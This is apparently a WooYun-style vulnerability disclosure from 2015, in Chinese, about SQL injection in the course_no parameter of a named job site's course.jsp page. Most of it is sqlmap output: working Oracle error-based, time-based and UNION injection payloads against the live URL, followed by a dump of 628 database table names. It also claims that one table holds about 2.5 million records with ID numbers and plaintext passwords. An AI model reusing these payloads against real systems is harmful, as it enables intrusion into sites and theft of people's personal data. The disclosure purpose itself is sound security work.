2015-09-06：细节已通知厂商，等待厂商处理中
2015-09-11：厂商已主动忽略该漏洞，细节向公众公开
http://www.job168.com/train/course.jsp?all=on&course_no=1 （注入参数：course_no）
sqlmap resumed the following injection point(s) from stored session:---Parameter: course_no (GET) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: all=on&course_no=1' AND 9846=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(106)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9846=9846) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(113)||CHR(106)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'QiaE'='QiaE Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: all=on&course_no=1' AND 2678=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(122)||CHR(110)||CHR(80),5) AND 'KrFd'='KrFd Type: UNION query Title: Generic UNION query (NULL) - 29 columns Payload: all=on&course_no=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(120)||CHR(106)||CHR(98)||CHR(113)||CHR(116)||CHR(76)||CHR(73)||CHR(115)||CHR(78)||CHR(70)||CHR(90)||CHR(84)||CHR(122)||CHR(79)||CHR(113)||CHR(113)||CHR(106)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- ---web application technology: Nginx, JSPback-end DBMS: OracleDatabase: NFRC[628 tables]+--------------------------------+| NEWÔÖÁŻÍŹ˛˝ÁÔ͡ŹŇŔÚ$_TEMP || ÔÖÁŻÍŹ˛˝ÁÔ͡ŹŇŔÚ_ĐÂ$_TEMP || ÔÖÁŻÍŹ˛˝ÇÓÖ°ŹŇŔÚ$_TEMP || ÔÖÁŻÍŹ˛˝Č˲ĹČËĘ¡¨ŠĆ$_TEMP || ÔÖÁŻÍŹ˛˝ŐĐƸĐĹϢ$_TEMP || ˇŹŘŽĽĽÎŤ || AB || ACCESSLOG || ACCESS_STATISTIC || ACTIVEEMAIL || ACTIVELOG || AD_AUTO || AD_DESIGN || AD_OPEN_LOG || AD_STAT || AD_TRACER || AGENCY_MATERIAL || AGENCY_NOTICE || AGENCY_PERSON || AGENCY_PROGRESS || AGENCY_SERVICE || AGENCY_TRACER || ALEXA || ALEXA_BK || ALEXA_PRIZE || ALIPAY || ALIPAY_OUTLET || ANGEL_P || ANGEL_P_BK || APPLYLOG || APPLYLOG_BK || APPLYLOG_TEMP || APP_FEEDBACK || APP_LOG || APP_RECRUIT_SHAKE || APP_VERSION || ASIAN_PHOTO || ASIAN_PHOTO_VOTE || ASIAN_PHOTO_VOTE_BK || ASSIGN || ASSIGN2 || BBS_USER || BLOG_ALBUM || BLOG_ARTICLE || BLOG_FRIEND || BLOG_INFO || BLOG_MSG || BLOG_PERSON || BLOG_PHOTO || 
BLOG_RANK || BLOG_REPLY || BLOG_REPORT || BLOG_TYPE || BROAD_MESSAGE || CARD || CC || CLAIM || COMMON_EXCHANGE || COMMON_GOODS || COMMON_GOODS_HIPIAO || COMMON_GOODS_OWNS || COMMON_GOODS_OWNSLOG || COMMON_PRODUCT || COMPANY || COMPANY_APPLYFUNC || COMPANY_BACKUP || COMPANY_DEGREE || COMPANY_FIELD || COMPANY_INDUSTRY || COMPANY_PROPERTY || COMPANY_STATICS || COMPANY_WORKLOC || COMPANY_WORKYEARS || COM_POPULOR_WORD || COURSEWARE || CTIBILL || CUSTOMER_MOBILE || CUSTOM_INFO || CYDS_ARTICLE || CYDS_INFO || CYDS_MEMBER || CYDS_PROJ || CYDS_PROJ_2012 || CYDS_PROJ_BAK || CYDS_PROJ_BK || CYDS_SCHOOL || CYDS_SCHOOL_2012 || CYDS_SCORE || CYDS_SCORE_2012 || CYDS_USERS || CYDS_VOTE || C_AD || C_ASSIGN || C_ASSIGN2 || C_ATTACHMENT || C_ATTACHMENT_HISTORY || C_CONTACT || C_CUSTOM || C_ENGLISH || C_EXPORT || C_EXT_FEE || C_FAVORITE || C_FAVORITE_TYPE || C_FEE_HISTORY || C_HRA_TRACER || C_ID5_FEE || C_ID5_TRACER || C_INTEGRAL || C_JYPPH || C_OP_LOG || C_PICTURE || C_REPLY || C_RESUME_LOG || C_SURVEY || C_TRACER || C_XQT || DATAYEAR || DELIVERY_COMPANY || DELIVERY_RESUME || DEPARTMENT || DEVELOP_ASSIGN || DEVELOP_ROBIN || DEVELOP_SHIELD || DEVELOP_TRACE || DIC_AUTH || DIC_BLOG_TMPL || DIC_COURSE || DIC_COURSE1 || DIC_COURSE2 || DIC_DEGREE || DIC_DEPT || DIC_EMPNUM || DIC_FIELD || DIC_FIELD2 || DIC_FUNC || DIC_FUNC_CATEGORY || DIC_FUNC_TYPE || DIC_FUND || DIC_H_CLIENT || DIC_H_COOPERATE || DIC_H_INDUSTRY || DIC_H_PACT_TMPL || DIC_H_PROPERTY || DIC_H_REGION || DIC_INDUSTRY || DIC_LANGUAGE || DIC_LEVEL || DIC_LEVEL2 || DIC_MEMBER_TYPE || DIC_OPERATOR || DIC_PROPERTY || DIC_REGION || DIC_REGION_STREET || DIC_SALARY || DIC_SALARY2 || DIC_SCHOOL_KIND || DIC_SCHOOL_PROPERTY || DIC_SVC || DIC_TAG || DIC_TALENT_TYPE || DIC_TITLE || DRAW || DXC_SOLD || DXC_VIP || EDM_TMP || EMAIL_BLACKLIST || EMAIL_LOG || EMAIL_RECORD || EMAIL_SETTING || EMAIL_TEMPLATE || ENROLL || ENTERGZ || ENTRY || ENTRY_EDUC || ENTRY_OTHER || ENTRY_POS || ENTRY_SCORE || EVAL_MODEL || EXAM_ACTIVE || EXAM_COURSE || 
EXAM_COU_TUTO || EXAM_FEE || EXAM_REGIST || EXAM_RESEARCH || EXAM_SCHEDULE || EXAM_SEND_SMS || EXAM_SIGNIN || EXAM_SMSREQ || EXAM_STUDENT || EXAM_TEACHER || EXAM_TRACE || EXAM_TRAIN_BOOKING || EXAM_TUTORIAL || EXAM_TUTO_TAKE || EXCEL_COMPANY || FAIR_APPLY_LOG || FAIR_APPLY_STALL || FAIR_FEEDBACK || FAIR_LOC || FAIR_RECRUIT || FEEDBACK || FEEDBACK2 || FEEDBACK3 || FIFA_FANS || FIFA_POST || FIFA_TEAM || FROM2FUTURE || GLOBAL_USER || GOLDTURNTABLE_LOG || GOLDTURNTABLE_PRIZE || GOLDTURNTABLE_TICKET || GZSA || GZ_GRADUATE || HRA_COMPETENCY || HRA_LAW || HRA_SUBJECT || HRA_S_BASE_DATA_2010 || HRA_S_BASE_DATA_2012 || HRA_S_CITY || HRA_S_CITY_07 || HRA_S_DEGREE_FACTOR_2010 || HRA_S_DEGREE_FACTOR_2012 || HRA_S_DETAIL_FACTOR_2010 || HRA_S_DETAIL_FACTOR_2012 || HRA_S_EMPLOYEE_NUM_FACTOR_2010 || HRA_S_EMPLOYEE_NUM_FACTOR_2012 || HRA_S_INDUSTRY || HRA_S_INDUSTRY_07 || HRA_S_INDUSTRY_FACTOR_2010 || HRA_S_INDUSTRY_FACTOR_2012 || HRA_S_LOCATION_2010 || HRA_S_LOCATION_2012 || HRA_S_LOC_FACTOR_2010 || HRA_S_LOC_FACTOR_2012 || HRA_S_PERCENT_FACTOR_2010 || HRA_S_PERCENT_FACTOR_2012 || HRA_S_POSITION || HRA_S_POSITION_07 || HRA_S_POSITION_2010 || HRA_S_POSITION_2012 || HRA_S_POSITION_STAT || HRA_S_POSITION_STAT_07 || HRA_S_PROPERTY_FACTOR_2010 || HRA_S_PROPERTY_FACTOR_2012 || HRA_S_SAMPLE_ANALYSIS_2010 || HRA_S_SAMPLE_ANALYSIS_2012 || HRA_S_SAMPLE_STAT || HRA_S_SAMPLE_STAT_07 || HRA_S_WORKYEAR_FACTOR_2010 || HRA_S_WORKYEAR_FACTOR_2012 || HRA_TEMPLATE || HRA_TEMP_TYPE || HRS_PERSON || HRS_P_EDUC || HRS_P_EXP || HRS_P_VOL || HR_NOTE || HUNTER || HUNTER_COMPANY || HUNTER_C_ENGLISH || HUNTER_PERSON || HUNTER_RECRUIT || H_APPLYLOG || H_APPRAISE || H_ATTACHMENT || H_ATTACHMENT_P || H_CANDIDATE || H_CANDIDATE_BAK || H_CANDIDATE_BK || H_CHANGE || H_COMMEND || H_COMPANY || H_COMPANY_BK || H_C_EDUC || H_C_EDUC_BK || H_C_EXP || H_C_EXP_BK || H_C_TAG || H_DEL_LOG || H_DESCRIPT || H_EMAIL || H_FEEDBACK || H_FEEDBACK2 || H_FEEDBACK2_BK || H_FEEDBACK_OL || H_INV || H_MESSAGE || H_PACT || H_PACT2 || 
H_PAYLOG || H_PHOTO || H_RECOMMEND || H_RECRUIT || H_RECRUITLOG || H_R_EDUC || H_R_EXP || H_SEARCH || H_SERVICE || H_SERVICE_BK || H_TEXT || H_TRACE || H_TRACE2 || H_TRACE2_BK || H_TRACE_BK || H_VISIT_LOG || ID5ADJ || IDCARD_TEMP || IND_POPULOR_WORD || INFO || INFO_ATTACHMENT || INFO_POSITION || INFO_PY || INFO_REPLY || INTOGZ_APPLYLOG || INTOGZ_COMPANY || INTOGZ_RECRUIT || INTOGZ_REQUIREMENT || INVEST || JOB168BABY || JOB168BABY_GUESS || JOB168BABY_VOTE_LOG || JOB168BABY_VOTE_LOG_BK || JOB168E || JOB168E_REPLY || JOB168E_TMP || JOB168E_TMP2 || JOB168E_TMP3 || JOB_FAIR || JZ_ACCESS || JZ_FAQ || JZ_PERSON || JZ_USER || JZ_USER_ACCESS || KEDUO_USER || LINK_CLICK_LOG || LOCKEDEMAIL || LOG114 || MAIL || MAILDS_LOG || MAILDS_OPEN_LOG || MAIL_BL || MAIL_SUBSCRIPT || MAP2010_FIELD || MAP2010_FUNC || MAP2010_INDUSTRY || MAP2010_REGION || MAP2011_FUNC || MEETING || MEETING_APPLY || MEETING_APPLY_RECRUIT || MEETING_ARTICLE || MEETING_BOOTH || MEETING_RELATE || MEETING_SIGNIN || MEETING_SIGNIN_LOG || MEMBERFEE || MEMBERFEE2 || MEMBERFEE_BK || MEMBER_FEE || MESSAGE || NETPAY_OUTLET || NEWSPAPER_BOARD || NEWSPAPER_DETAIL || NEWSPAPER_SECOND || NFRC2GZRIS || NOAHSARK || OAUTH_CONNECT || OK309_CARD || OK309_USER || OLDPHOTO || OLDPHOTO_VOTE_LOG || OP || OP200910301316 || OV_TRANSACTION || O_APPLYLOG || O_COMPANY || O_RECRUIT || O_TRACE || P || PARTNER || PAYMENTLOG || PERSON || PERSON_APPLYFUNC || PERSON_BACKUP || PERSON_DEGREE || PERSON_FIELD || PERSON_INDUSTRY || PERSON_PROPERTY || PERSON_SKILL || PERSON_STATICS || PERSON_SYNC || PERSON_TEMPLATE || PERSON_WORKLOC || PERSON_WORKYEARS || PHOTO || PLAN_TABLE || POCOUSER || POCOZINE || POCO_SERVICE || POCO_SERVICE_BUY || POCO_TEMPLATE || POCO_TEMPLATE_BUY || PP || PREPARE_COMPANY || PRESSIE_APPLY || PRESSIE_APPLY_DETAIL || PRESSIE_APPLY_INTEGRAL || PRICE_C_AD || PRICE_C_CUSTOM || PRICE_C_NP || PRICE_C_STD || PRICE_C_VER || PRODUCT || PRODUCT_PACKAGE || PRODUCT_PRICE || PT_APP_REGIST || PT_APP_VIEW || PT_BASE || PT_CERT || 
PT_C_COMPLAINT || PT_C_REVIEW || PT_C_SCORE || PT_EDUC || PT_EXP || PT_PROJ || PT_P_COMPLAINT || PT_P_REVIEW || PT_P_SCORE || PYZP_SIGNUP || P_ADDRESS || P_ARMY || P_ARTICLE || P_ARTICLE_BK || P_ATTACHMENT || P_AUTH || P_CARD || P_CERT || P_COLLECT || P_CUSTOM || P_DEGREE_CERT || P_EDUC || P_ENGLISH || P_ETCSVC || P_EVAL || P_EVAL_NEW || P_EXP || P_EXT_FEE || P_EXT_FEE2 || P_FAVORITE || P_FAVORITE_TEMP || P_FEE_HISTORY || P_ID || P_ID5 || P_INVEST_LOGIN || P_IVEST || P_NOTICE || P_OP_LOG || P_ORDER || P_OTHER || P_PRIZE || P_PROJ || P_REG_SPAM || P_RESUME || P_SAMPLING || P_SCHOOL || P_SEARCH_LOG || P_SENDOUT || P_SEND_FRIEND || P_SERVICE || P_SERVICE_LOG || P_SKILL || P_SMS_SVC || P_SMS_SVC2 || P_TASK || P_TASK_LOG || P_TEMPLATE || P_TEXT || P_TRACER || P_VISIT_LOG || P_VOL || P_XQT || QA || QUARTER_SUM || QUERYPASS2LOG || Q_BODY || Q_DIM || Q_ELEMENT || Q_EXPR || Q_MAP || Q_MODULE || Q_PAPER || Q_REMARK || Q_TOPIC || Q_VALUE || RCJ_ASSIGN || RCJ_SCORE || RCJ_USERS || RECRUIT || RECRUITLOG || RECRUIT_APPLY_RELATED || RECRUIT_BK || RECRUIT_CATALOG || RECRUIT_PYZP || RECRUIT_RECYCLED || RECRUIT_S || RECRUIT_TMP || REFERRER_TEMP || RESUME || RESUMEOUT_LOG || ROBIN_EXCEL_COMPANY || RR || SALARY_CITYCOEFFICIENT || SALARY_CITYCOEFFICIENT_07 || SALARY_DESCRIPTION || SALARY_DESCRIPTION_07 || SALARY_INDUSTRYCOEFFICIENT || SALARY_INDUSTRYCOEFFICIENT_07 || SALARY_POSITION || SALARY_POSITION_07 || SALARY_SAMPLEANALYSIS || SALARY_SAMPLEANALYSIS_07 || SALARY_STAT || SALESMAN || SCHOOL || SCHOOL_FIELD || SCHOOL_INFO || SCHOOL_MEMBER_FEE || SCHOOL_PAYMENTLOG || SCHOOL_PERSON || SCHOOL_PHOTO || SCHOOL_RECRUITLOG || SCHOOL_REQ || SCHOOL_STUDINFO || SHOP_APPLY || SHOP_ARTICLE || SHOP_ARTICLE_STORE || SHOP_BUSINESS || SHOP_BUSINESS_LIMITS || SHOP_COUPON || SHOP_CUSTOMER || SHOP_DELIVERY || SHOP_GOODS || SHOP_GOODS_BELONG || SHOP_GOODS_BRAND || SHOP_GOODS_PIC || SHOP_GOODS_REPLY || SHOP_GOODS_TYPE || SHOP_HRCOST || SHOP_MEMBER_LEVEL || SHOP_ORDER || SHOP_ORDER_DETAIL || SHOP_PAY || 
SHOP_POSTAGE || SHOP_REPORT || SHOP_SALESCOST || SHOP_STOCK || SHOP_STOCK_ORDER || SHOP_STOCK_ORDER_DETAIL || SHOP_STRATEGY || SHOWCASE || SHOWCASE_AD || SIGNUP || SMS || SMS_ANTI_RESEND || SMS_CUSTOM || SMS_CUSTOM_LIST || SMS_MESSAGE || SMS_MO || SMS_NO_ID || SMS_NUMBER || SMS_NUMBER2 || SMS_REQUIREMENT || SMS_TEMP || SMS_TRACER || SMS_WHITELIST || SMS_WHITELIST_APPLY || SOFT_COMPANY || STATISTIC_CUSTOM || STUDENT_ASSIGN || SUB_COMPANY || SURVEY || SURVEY2 || SURVEY2_REPT || SURVEY_REPT || S_CUSTOM || S_FAVORITE || S_RECRUITMENT || S_SIGNUP || TAG_MAP || TALENT_KEYWORD_LOG || TASK_LOG || TBBBS || TBBBSORTS || TEMP_COMPANY || TEMP_CTI || TEMP_FAIL || TEMP_PERSON || TEMP_RECRUIT || TEMP_USER || TENPAY || TMP_ASSIGN || TMP_EMAIL_LOG || TRACE_LOG || TRAINING || TRAIN_APPLY || TRAIN_APPLY2 || TRAIN_CONSUME_LOG || TRAIN_COURSE || TRAIN_ORGAN || TRAIN_ORGAN_FEE || TRAIN_ORGAN_FEE_BK || TRAIN_PAYMENTLOG || TRAIN_TRAINER || TRANSFER || TRANSFER2 || TUTORIAL_STORE || T_CHG_ORDER || UNIONPAY || UNIT_KEYWORD_LOG || X_COMPANY || X_COMPANY_FEE || X_PERSON || X_PERSON_FEE || X_TRACE || ZSQZTLOG || ZSQZTVALID || ZYGH_COLLEGE || ZYGH_CPBG |+--------------------------------+
GLOBAL_USER 表中涉及约 250 万条信息，包括身份证号、账号和明文密码等信息。
危害等级：无影响（厂商忽略）
忽略时间:2015-09-11 11:18
漏洞Rank:4 (WooYun评价)
暂无